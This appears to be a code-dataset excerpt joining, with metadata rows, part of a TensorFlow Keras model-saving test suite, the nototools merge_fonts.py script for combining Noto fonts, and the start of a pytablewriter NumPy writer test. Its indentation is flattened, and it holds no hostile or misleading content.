model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_with_tf_optimizer(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_right_after_compilation(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_lambda_numpy_array_arguments(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
# This layer name will make the `layers_name` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
# the list of layer names into numpy array, which uses the same
# amount of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(
'adam', loss=keras.losses.MeanSquaredError(), metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if save_format in ['tf', 'tensorflow']:
return
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(saved_model_dir, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_model_with_long_weights_names(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if save_format in ['h5', 'hdf5', 'keras']:
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(saved_model_dir, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_model_saving_to_pre_created_h5py_file(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
loaded_model = keras.models.load_model(saved_model_dir)
out1 = loaded_model.predict(x)
self.assertAllClose(out, out1, atol=1e-05)
if save_format in ['tf', 'tensorflow']:
return
# Test h5 format specifically
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_constant_initializer_with_numpy(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
2,
input_shape=(3,),
kernel_initializer=keras.initializers.Constant(np.ones((3, 2)))))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
def test_saving_group_naming_h5py(self):
# Test saving model with layer which name is prefix to a previous layer
# name.
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
input_layer = keras.layers.Input((None, None, 3), name='test_input')
x = keras.layers.Conv2D(1, 1, name='conv1/conv')(input_layer)
x = keras.layers.Activation('relu', name='conv1')(x)
model = keras.models.Model(inputs=input_layer, outputs=x)
model.save_weights(h5_path)
model.load_weights(h5_path)
def test_primitive_attrs_contain_no_extraneous_strings(self):
if h5py is None:
self.skipTest('h5py required to run this test')
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential()
model.add(keras.layers.Dense(1, input_shape=[2]))
model.save(saved_model_dir, save_format=save_format)
if save_format in ['tf', 'tensorflow']:
return
h5file = h5py.File(saved_model_dir, 'r')
self.assertRegexpMatches(
h5file.attrs['keras_version'], r'^[\d]+\.[\d]+\.[\S]+$')
@test_util.run_in_graph_and_eager_modes
def test_functional_model_with_custom_loss_and_metric(self):
def _make_model():
inputs = keras.Input(shape=(4,))
x = keras.layers.Dense(8, activation='relu')(inputs)
outputs = keras.layers.Dense(3, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs)
custom_loss = keras.layers.Lambda(lambda x: keras.backend.sum(x * x))(x)
model.add_loss(custom_loss)
model.add_metric(custom_loss, aggregation='mean', name='custom_loss')
return model
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = _make_model()
model.compile(
loss=keras.losses.SparseCategoricalCrossentropy(),
optimizer=optimizers.gradient_descent_v2.SGD(),
metrics=[keras.metrics.SparseCategoricalCrossentropy()])
x = np.random.normal(size=(32, 4))
y = np.random.randint(0, 3, size=32)
model.train_on_batch(x, y)
evaluation_results = model.evaluate(x, y)
# Save and reload model.
model.save(saved_model_dir, save_format=save_format)
del model # Prevent misuse.
loaded_model = keras.models.load_model(saved_model_dir)
loaded_model_eval_results = loaded_model.evaluate(x, y)
# Assert all evaluation results are the same.
self.assertAllClose(evaluation_results, loaded_model_eval_results, 1e-9)
# Check correctness of the loss calculation.
self.assertAllGreater(evaluation_results, 0.)
evaluation_results = dict(
zip(loaded_model.metrics_names, evaluation_results))
self.assertNear(
evaluation_results['sparse_categorical_crossentropy'] +
evaluation_results['custom_loss'], evaluation_results['loss'], 1e-6)
def test_save_uncompiled_model_with_optimizer(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
model = keras.models.Sequential([keras.layers.Dense(1, input_shape=(3,))])
# Set the model's optimizer but don't compile. This can happen if the model
# is trained with a custom training loop.
model.optimizer = keras.optimizer_v2.rmsprop.RMSprop(lr=0.0001)
model.save(saved_model_dir, save_format=save_format)
if save_format in ['tf', 'tensorflow']:
loaded = keras.models.load_model(saved_model_dir)
self.assertIsInstance(loaded.optimizer,
keras.optimizer_v2.optimizer_v2.OptimizerV2)
# Factory functions to create models that will be serialized inside a Network.
def _make_graph_network(input_size, output_size):
inputs = keras.Input(input_size)
x = keras.layers.Dense(8, activation='relu')(inputs)
y = keras.layers.Dense(output_size)(x)
return keras.Model(inputs=inputs, outputs=y)
def _make_sequential(input_size, output_size):
del input_size
return keras.Sequential([
keras.layers.Dense(8, activation='relu'),
keras.layers.Dense(output_size),
])
def _make_sequential_built(input_size, output_size):
model = _make_sequential(input_size, output_size)
model.build((None, input_size))
return model
def _make_sequential_graph_network(input_size, output_size):
return keras.Sequential([
keras.layers.InputLayer(input_size),
keras.layers.Dense(8, activation='relu'),
keras.layers.Dense(output_size),
])
def _make_sequential_input_shape(input_size, output_size):
return keras.Sequential([
keras.layers.Dense(8, activation='relu', input_shape=(input_size,)),
keras.layers.Dense(output_size),
])
class _make_subclassed(keras.Model): # pylint: disable=invalid-name
def __init__(self, input_size, output_size):
super(_make_subclassed, self).__init__()
self._config = {'input_size': input_size, 'output_size': output_size}
self._hidden_layer = keras.layers.Dense(8, activation='relu', name='hidden')
self._logits_layer = keras.layers.Dense(output_size, name='logits')
def call(self, inputs):
x = self._hidden_layer(inputs)
return self._logits_layer(x)
def get_config(self):
return self._config
@classmethod
def from_config(cls, config):
return cls(**config)
class _make_subclassed_built(_make_subclassed): # pylint: disable=invalid-name
def __init__(self, input_size, output_size):
super(_make_subclassed_built, self).__init__(input_size, output_size)
self.build((None, input_size))
class TestWholeModelSavingWithNesting(test.TestCase, parameterized.TestCase):
"""Tests saving a whole model that contains other models."""
@parameterized.named_parameters([
('graph_network', _make_graph_network),
('sequential', _make_sequential),
('sequential_built', _make_sequential_built),
('sequential_graph_network', _make_sequential_graph_network),
('sequential_input_shape', _make_sequential_input_shape),
('subclassed', _make_subclassed),
('subclassed_built', _make_subclassed_built),
])
@test_util.run_in_graph_and_eager_modes
def test_functional(self, model_fn):
"""Tests serializing a model that uses a nested model to share weights."""
if h5py is None:
self.skipTest('h5py required to run this test')
def _make_model():
inputs = (keras.Input(shape=(4,), name='examples'),
keras.Input(shape=(4,), name='neighbors'))
base_model = model_fn(inputs[0].shape.as_list()[-1], 2)
outputs = keras.layers.add([base_model(inputs[0]), base_model(inputs[1])])
return keras.Model(inputs=inputs, outputs=outputs)
x = (np.random.normal(size=(16, 4)).astype(np.float32),
np.random.normal(size=(16, 4)).astype(np.float32))
model = _make_model()
predictions = model(x)
# Save and reload.
model_path = os.path.join(self.get_temp_dir(), 'model.h5')
model.save(model_path)
del model
loaded_model = keras.models.load_model(
model_path,
custom_objects={
'_make_subclassed': _make_subclassed,
'_make_subclassed_built': _make_subclassed_built,
},
compile=False)
self.assertAllClose(loaded_model(x), predictions, 1e-9)
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
def test_keras_optimizer_warning(self):
graph = ops.Graph()
with graph.as_default(), self.session(graph):
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer=optimizers.Adam(), metrics=['acc'])
model._make_train_function()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
with test.mock.patch.object(logging, 'warning') as mock_log:
model.save_weights(prefix)
self.assertRegexpMatches(
str(mock_log.call_args),
'Keras optimizer')
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.cached_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
def _weight_loading_test_template(self, make_model_fn):
with self.cached_session():
model = make_model_fn()
model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
train_x = np.random.random((3, 2))
train_y = np.random.random((3,))
x = constant_op.constant(train_x, dtype=dtypes.float32)
model.train_on_batch(train_x, train_y)
model.save_weights(prefix, save_format='tf')
ref_y_before_train = model.predict(train_x)
model.train_on_batch(train_x, train_y)
ref_y_after_train = model.predict(train_x)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
self.assertAllClose(ref_y_before_train, self.evaluate(model(x)))
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
self.assertAllClose(
ref_y_before_train,
self.evaluate(load_model(x)))
load_model = make_model_fn()
load_model.load_weights(prefix)
# We need to run some of the restore ops for predict(), but not all
# variables have been created yet (optimizer slot variables). Tests
# incremental restore.
load_model.predict(train_x)
load_model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
load_model.train_on_batch(train_x, train_y)
self.assertAllClose(ref_y_after_train, self.evaluate(load_model(x)))
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn):
with self.cached_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix)
self.assertEqual(
prefix,
checkpoint_management.latest_checkpoint(temp_dir))
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
status = second_model.load_weights(prefix)
second_model(x)
status.run_restore_ops()
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
status = model.load_weights(prefix)
status.run_restore_ops(session)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
y = keras.layers.Dropout(rate=0.1)(b)
return keras.models.Model(a, y)
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore)
@test_util.run_in_graph_and_eager_modes
def test_incompatible_checkpoint(self):
save_path = trackable.Checkpoint().save(
os.path.join(self.get_temp_dir(), 'ckpt'))
m = keras.Model()
with self.assertRaisesRegexp(AssertionError, 'Nothing to load'):
m.load_weights(save_path)
m.dense = keras.layers.Dense(2)
m.dense(constant_op.constant([[1.]]))
with self.assertRaisesRegexp(
AssertionError, 'Nothing except the root object matched'):
m.load_weights(save_path)
@test_util.run_in_graph_and_eager_modes
def test_directory_passed(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'ckpt/')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_relative_path(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
os.chdir(self.get_temp_dir())
prefix = 'ackpt'
self.evaluate(v.assign(42.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt.index'))
self.evaluate(v.assign(1.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
prefix = 'subdir/ackpt'
self.evaluate(v.assign(43.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('subdir/ackpt.index'))
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(43., self.evaluate(v))
prefix = 'ackpt/'
self.evaluate(v.assign(44.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt/.index'))
self.evaluate(v.assign(3.))
m.load_weights(prefix)
self.assertEqual(44., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_nonexistent_prefix_directory(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'bckpt')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
if __name__ == '__main__':
test.main()
|
apache-2.0
| 7,052,613,163,125,570,000 | 36.661588 | 80 | 0.630632 | false |
dougfelt/nototools
|
nototools/merge_fonts.py
|
1
|
6510
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Merges fonts.
Two notable differences between merge_noto and this script are:
1. merge_noto merges all fonts in Noto, or merges a subset of Noto
clustered by region. While This script merges a selected font subset.
2. The line metrics in the final merged font are substituted by those in
NotoSans-Regular.ttf (LGC). This is to optimize the user experience in LGC.
The drawback is some tall scripts in the file list (like Balinese, Cuneiform,
Javaness) might vertically overlap with each other and also be clipped by the
edge of the UI. This should be handled carefully by the UI designer, say
changing the line height or adding the margin.
Sample Usage:
$ merge_fonts.py -d noto-fonts/unhinted -o NotoSansMerged-Regular.ttf
"""
import sys
import os.path
import logging
from argparse import ArgumentParser
from fontTools import ttLib
from fontTools import merge
from merge_noto import add_gsub_to_font, has_gsub_table
from nototools.substitute_linemetrics import read_line_metrics, set_line_metrics
from fontTools.misc.loggingTools import Timer
log = logging.getLogger("nototools.merge_fonts")
# directory that contains the files to be merged
directory = ''
# file names to be merged
files = [
# It's recommended to put NotoSans-Regular.ttf as the first element in the
# list to maximize the amount of meta data retained in the final merged font.
'NotoSans-Regular.ttf',
'NotoSansAvestan-Regular.ttf',
'NotoSansBalinese-Regular.ttf',
'NotoSansBamum-Regular.ttf',
'NotoSansBatak-Regular.ttf',
'NotoSansBrahmi-Regular.ttf',
'NotoSansBuginese-Regular.ttf',
'NotoSansBuhid-Regular.ttf',
'NotoSansCarian-Regular.ttf',
'NotoSansCoptic-Regular.ttf',
'NotoSansCuneiform-Regular.ttf',
'NotoSansCypriot-Regular.ttf',
'NotoSansEgyptianHieroglyphs-Regular.ttf',
'NotoSansGlagolitic-Regular.ttf',
'NotoSansGothic-Regular.ttf',
'NotoSansHanunoo-Regular.ttf',
'NotoSansImperialAramaic-Regular.ttf',
'NotoSansInscriptionalPahlavi-Regular.ttf',
'NotoSansInscriptionalParthian-Regular.ttf',
'NotoSansJavanese-Regular.ttf',
'NotoSansKaithi-Regular.ttf',
'NotoSansKayahLi-Regular.ttf',
'NotoSansKharoshthi-Regular.ttf',
'NotoSansLepcha-Regular.ttf',
'NotoSansLimbu-Regular.ttf',
'NotoSansLinearB-Regular.ttf',
'NotoSansLisu-Regular.ttf',
'NotoSansLycian-Regular.ttf',
'NotoSansLydian-Regular.ttf',
'NotoSansMandaic-Regular.ttf',
'NotoSansMeeteiMayek-Regular.ttf',
'NotoSansMongolian-Regular.ttf',
'NotoSansNKo-Regular.ttf',
'NotoSansNewTaiLue-Regular.ttf',
'NotoSansOgham-Regular.ttf',
'NotoSansOlChiki-Regular.ttf',
'NotoSansOldItalic-Regular.ttf',
'NotoSansOldPersian-Regular.ttf',
'NotoSansOldSouthArabian-Regular.ttf',
'NotoSansOldTurkic-Regular.ttf',
'NotoSansOsmanya-Regular.ttf',
'NotoSansPhagsPa-Regular.ttf',
'NotoSansPhoenician-Regular.ttf',
'NotoSansRejang-Regular.ttf',
'NotoSansRunic-Regular.ttf',
'NotoSansSamaritan-Regular.ttf',
'NotoSansSaurashtra-Regular.ttf',
'NotoSansShavian-Regular.ttf',
'NotoSansSundanese-Regular.ttf',
'NotoSansSylotiNagri-Regular.ttf',
'NotoSansSyriacEastern-Regular.ttf',
'NotoSansTagalog-Regular.ttf',
'NotoSansTagbanwa-Regular.ttf',
'NotoSansTaiLe-Regular.ttf',
'NotoSansTaiTham-Regular.ttf',
'NotoSansTaiViet-Regular.ttf',
'NotoSansThaana-Regular.ttf',
'NotoSansTifinagh-Regular.ttf',
'NotoSansUgaritic-Regular.ttf',
'NotoSansVai-Regular.ttf',
'NotoSansYi-Regular.ttf',
'NotoSansCham-Regular.ttf',
]
def build_valid_filenames(files=files, directory=directory):
files = list(files)
directory = directory.rstrip('/')
if directory == '' or directory == None:
directory = '.'
valid_files = []
for f in files:
valid_file = directory + '/' + f
if not os.path.isfile(valid_file):
log.warn('can not find %s, skipping it.' % valid_file)
else:
valid_files.append(valid_file)
if len(valid_files) == 0:
return valid_files
if os.path.basename(valid_files[0]) != files[0]:
log.warn('can not find the font %s to read line metrics from. Line '
+ 'metrics in the result might be wrong.' % files[0])
return valid_files
def main():
t = Timer()
parser = ArgumentParser()
parser.add_argument('-d', '--directory', default='./',
help='Path to directory containing the fonts')
parser.add_argument('-o', '--output', default='merged.ttf',
help='Path to output file.')
parser.add_argument('-v', '--verbose', action='store_true',
help='Verbose mode, printing out more info')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
valid_files = build_valid_filenames(directory=args.directory)
if len(valid_files) <= 1:
log.warn('expecting at least two fonts to merge, but only got %d '
+ 'font(s).', len(valid_files))
sys.exit(-1)
for idx, file in enumerate(valid_files):
if not has_gsub_table(file):
log.info('adding default GSUB table to %s.' % file)
valid_files[idx] = add_gsub_to_font(file)
merger = merge.Merger()
print('Merging %d Fonts...' % len(valid_files))
font = merger.merge(valid_files)
# Use the line metric in the first font to replace the one in final result.
metrics = read_line_metrics(ttLib.TTFont(valid_files[0]))
set_line_metrics(font, metrics)
font.save(args.output)
font.close()
print('%d fonts are merged. %d fonts are skipped. Cost %0.3f s.' % (len(valid_files), len(files) - len(valid_files), t.time()))
print('Please check the result at %s.' % os.path.abspath(
os.path.realpath(args.output)))
if __name__ == '__main__':
main()
|
apache-2.0
| -1,896,441,785,038,470,700 | 35.166667 | 131 | 0.697389 | false |
thombashi/pytablewriter
|
test/writer/text/sourcecode/test_numpy_writer.py
|
1
|
6388
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import pytest
import pytablewriter as ptw
from ...._common import print_test_result
from ....data import (
Data,
headers,
mix_header_list,
mix_value_matrix,
null_test_data_list,
value_matrix,
value_matrix_iter,
value_matrix_with_none,
)
try:
import numpy as np # noqa: W0611
SKIP_DATAFRAME_TEST = False
except ImportError:
SKIP_DATAFRAME_TEST = True
normal_test_data_list = [
Data(
table="table-name ho'ge",
indent=0,
header=headers,
value=value_matrix,
expected="""table_name_ho_ge = np.array([
["a", "b", "c", "dd", "e"],
[1, 123.1, "a", 1, 1],
[2, 2.2, "bb", 2.2, 2.2],
[3, 3.3, "ccc", 3, "cccc"],
])
""",
),
Data(
table="empty value",
indent=0,
header=headers,
value=None,
expected="""empty_value = np.array([
["a", "b", "c", "dd", "e"],
])
""",
),
Data(
table="table with%null-value",
indent=0,
header=headers,
value=value_matrix_with_none,
expected="""table_with_null_value = np.array([
["a", "b", "c", "dd", "e"],
[1, None, "a", 1, None],
[None, 2.2, None, 2.2, 2.2],
[3, 3.3, "ccc", None, "cccc"],
[None, None, None, None, None],
])
""",
),
Data(
table="mix data types",
indent=0,
header=mix_header_list,
value=mix_value_matrix,
expected="""mix_data_types = np.array([
["i", "f", "c", "if", "ifc", "bool", "inf", "nan", "mix_num", "time"],
[1, 1.1, "aa", 1, 1, True, np.inf, np.nan, 1, dateutil.parser.parse("2017-01-01T00:00:00")],
[2, 2.2, "bbb", 2.2, 2.2, False, np.inf, np.nan, np.inf, "2017-01-02 03:04:05+09:00"],
[3, 3.33, "cccc", -3, "ccc", True, np.inf, np.nan, np.nan, dateutil.parser.parse("2017-01-01T00:00:00")],
])
""",
),
Data(
table="mix data types wo header",
indent=0,
header=None,
value=mix_value_matrix,
expected="""mix_data_types_wo_header = np.array([
[1, 1.1, "aa", 1, 1, True, np.inf, np.nan, 1, dateutil.parser.parse("2017-01-01T00:00:00")],
[2, 2.2, "bbb", 2.2, 2.2, False, np.inf, np.nan, np.inf, "2017-01-02 03:04:05+09:00"],
[3, 3.33, "cccc", -3, "ccc", True, np.inf, np.nan, np.nan, dateutil.parser.parse("2017-01-01T00:00:00")],
])
""",
),
Data(
table="float-with-null",
indent=0,
header=["a", "b"],
value=[
["0.03785679191278808", "826.21158713263"],
[None, "826.21158713263"],
[0.1, "1.0499675627886724"],
],
expected="""float_with_null = np.array([
["a", "b"],
[0.03785679191278808, 826.21158713263],
[None, 826.21158713263],
[0.1, 1.0499675627886724],
])
""",
),
]
table_writer_class = ptw.NumpyTableWriter
class Test_NumpyTableWriter_write_new_line:
def test_normal(self, capsys):
writer = table_writer_class()
writer.write_null_line()
out, _err = capsys.readouterr()
assert out == "\n"
class Test_NumpyTableWriter_write_table:
